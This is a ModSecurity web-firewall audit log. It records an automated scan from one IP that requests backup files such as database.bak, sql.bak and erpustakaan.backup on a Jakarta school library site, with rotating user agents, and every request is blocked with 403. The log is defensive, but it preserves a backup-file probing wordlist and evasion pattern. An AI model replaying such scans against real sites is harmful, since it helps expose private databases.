Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ab633014-Z-- --598e7f19-A-- [18/May/2025:11:51:22 +0700] aClnSvypzAd0elWOk7o8tgAAAAI 103.236.140.4 56796 103.236.140.4 8181 --598e7f19-B-- GET /database.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36 OPR/54.0.2952.64 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 151224643 --598e7f19-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --598e7f19-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543882989442 1690 (- - -) Stopwatch2: 1747543882989442 1690; combined=677, p1=317, p2=331, p3=0, p4=0, p5=29, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --598e7f19-Z-- --b939f822-A-- [18/May/2025:11:51:23 +0700] aClnS_ypzAd0elWOk7o8vAAAAA0 103.236.140.4 56796 103.236.140.4 8181 --b939f822-B-- GET /sales.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.67 Safari/537.36 OPR/56.0.3051.99 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 151224678 --b939f822-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --b939f822-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543883052263 1787 (- - -) Stopwatch2: 1747543883052263 1787; combined=714, p1=345, p2=341, p3=0, p4=0, p5=28, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b939f822-Z-- --b883f829-A-- [18/May/2025:11:51:23 +0700] aClnS_ypzAd0elWOk7o8vgAAAAA 103.236.140.4 56796 103.236.140.4 8181 --b883f829-B-- GET /wp.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.92 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 151224696 --b883f829-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --b883f829-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543883077502 1559 (- - -) Stopwatch2: 1747543883077502 1559; combined=637, p1=314, p2=296, p3=0, p4=0, p5=27, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b883f829-Z-- --c5d14339-A-- [18/May/2025:11:51:23 +0700] aClnS_ypzAd0elWOk7o8wAAAABQ 103.236.140.4 56796 103.236.140.4 8181 --c5d14339-B-- GET /sql.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 117609722 --c5d14339-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --c5d14339-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543883083807 1818 (- - -) Stopwatch2: 1747543883083807 1818; combined=663, p1=335, p2=302, p3=0, p4=0, p5=26, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c5d14339-Z-- --b22c7e73-A-- [18/May/2025:11:51:23 +0700] aClnS0PRqak7bVuUS6cS4gAAAI8 103.236.140.4 56816 103.236.140.4 8181 --b22c7e73-B-- GET /js.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:67.0.1) Gecko/20100101 Firefox/67.0.1 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 151093331 --b22c7e73-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --b22c7e73-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543883084294 1637 (- - -) Stopwatch2: 1747543883084294 1637; combined=658, p1=324, p2=308, p3=0, p4=0, p5=26, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b22c7e73-Z-- --b90d1d56-A-- [18/May/2025:11:51:23 +0700] aClnS0PRqak7bVuUS6cS4wAAAII 103.236.140.4 56816 103.236.140.4 8181 --b90d1d56-B-- GET /test.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (X11; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.67 Safari/537.36 OPR/56.0.3051.99 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 151945250 --b90d1d56-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --b90d1d56-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543883095182 2421 (- - -) Stopwatch2: 1747543883095182 2421; combined=872, p1=432, p2=412, p3=0, p4=0, p5=28, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b90d1d56-Z-- --befcef7e-A-- [18/May/2025:11:51:23 +0700] aClnS0PRqak7bVuUS6cS5AAAAJc 103.236.140.4 56816 103.236.140.4 8181 --befcef7e-B-- GET /2016.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 153190618 --befcef7e-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --befcef7e-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543883099110 1832 (- - -) Stopwatch2: 1747543883099110 1832; combined=778, p1=339, p2=412, p3=0, p4=0, p5=27, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --befcef7e-Z-- --f9ecef42-A-- [18/May/2025:11:51:23 +0700] aClnS0PRqak7bVuUS6cS5QAAAIA 103.236.140.4 56816 103.236.140.4 8181 --f9ecef42-B-- GET /erpustakaan.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (X11; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.80 Safari/537.36 OPR/56.0.3051.104 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 153190625 --f9ecef42-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --f9ecef42-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543883106086 1619 (- - -) Stopwatch2: 1747543883106086 1619; combined=674, p1=334, p2=314, p3=0, p4=0, p5=26, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f9ecef42-Z-- --7f77c665-A-- [18/May/2025:11:51:23 +0700] aClnS_ypzAd0elWOk7o8wgAAAA4 103.236.140.4 56796 103.236.140.4 8181 --7f77c665-B-- GET /tar.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36 OPR/56.0.3051.52 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 151093347 --7f77c665-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --7f77c665-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543883111238 1680 (- - -) Stopwatch2: 1747543883111238 1680; combined=706, p1=343, p2=335, p3=0, p4=0, p5=28, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7f77c665-Z-- --5e1c9770-A-- [18/May/2025:11:51:23 +0700] aClnS_ypzAd0elWOk7o8xAAAABI 103.236.140.4 56796 103.236.140.4 8181 --5e1c9770-B-- GET /bbs.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.67 Safari/537.36 OPR/56.0.3051.99 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 151093360 --5e1c9770-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --5e1c9770-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543883126106 1851 (- - -) Stopwatch2: 1747543883126106 1851; combined=718, p1=364, p2=328, p3=0, p4=0, p5=26, sr=93, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5e1c9770-Z-- --8b49587d-A-- [18/May/2025:11:51:23 +0700] aClnS0PRqak7bVuUS6cS6QAAAIU 103.236.140.4 56816 103.236.140.4 8181 --8b49587d-B-- GET /smkn22jakartaschid.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.109 Safari/537.36 OPR/51.0.2830.34 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 153190636 --8b49587d-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --8b49587d-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543883147197 1672 (- - -) Stopwatch2: 1747543883147197 1672; combined=694, p1=341, p2=327, p3=0, p4=0, p5=26, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8b49587d-Z-- --91405064-A-- [18/May/2025:11:51:23 +0700] aClnS0PRqak7bVuUS6cS6gAAAIg 103.236.140.4 56816 103.236.140.4 8181 --91405064-B-- GET /erpustakaan.backup HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0 Safari/537.36 OPR/60.0.3255.170 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 113175796 --91405064-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --91405064-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".backup"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543883162171 1726 (- - -) Stopwatch2: 1747543883162171 1726; combined=722, p1=361, p2=332, p3=0, p4=0, p5=28, sr=71, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --91405064-Z-- --82ce0850-A-- [18/May/2025:11:51:23 +0700] aClnS_ypzAd0elWOk7o8xQAAAAw 103.236.140.4 56796 103.236.140.4 8181 --82ce0850-B-- GET /error_log.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.84 Safari/537.36 OPR/54.0.2952.71 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 70090963 --82ce0850-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --82ce0850-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543883162449 1607 (- - -) Stopwatch2: 1747543883162449 1607; combined=646, p1=321, p2=297, p3=0, p4=0, p5=28, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --82ce0850-Z-- --9ee5934e-A-- [18/May/2025:11:51:23 +0700] aClnSxir-GlPrFVVKe5E0AAAAEE 103.236.140.4 56832 103.236.140.4 8181 --9ee5934e-B-- GET /127.0.0.1.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36 OPR/56.0.3051.52 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 110436710 --9ee5934e-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --9ee5934e-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".0.0.1.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543883163241 2110 (- - -) Stopwatch2: 1747543883163241 2110; combined=787, p1=369, p2=389, p3=0, p4=0, p5=28, sr=72, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9ee5934e-Z-- --3fe4890a-A-- [18/May/2025:11:51:23 +0700] aClnSxir-GlPrFVVKe5E0gAAAFc 103.236.140.4 56832 103.236.140.4 8181 --3fe4890a-B-- GET /archive.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.1805 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 153190657 --3fe4890a-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --3fe4890a-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543883171530 1971 (- - -) Stopwatch2: 1747543883171530 1971; combined=787, p1=424, p2=335, p3=0, p4=0, p5=28, sr=95, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3fe4890a-Z-- --498cb605-A-- [18/May/2025:11:51:23 +0700] aClnSxir-GlPrFVVKe5E0wAAAEI 103.236.140.4 56832 103.236.140.4 8181 --498cb605-B-- GET /2015.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2; rv:67.0.2) Gecko/20100101 Firefox/67.0.2 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 110436721 --498cb605-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --498cb605-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543883177390 1746 (- - -) Stopwatch2: 1747543883177390 1746; combined=701, p1=327, p2=347, p3=0, p4=0, p5=26, sr=68, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
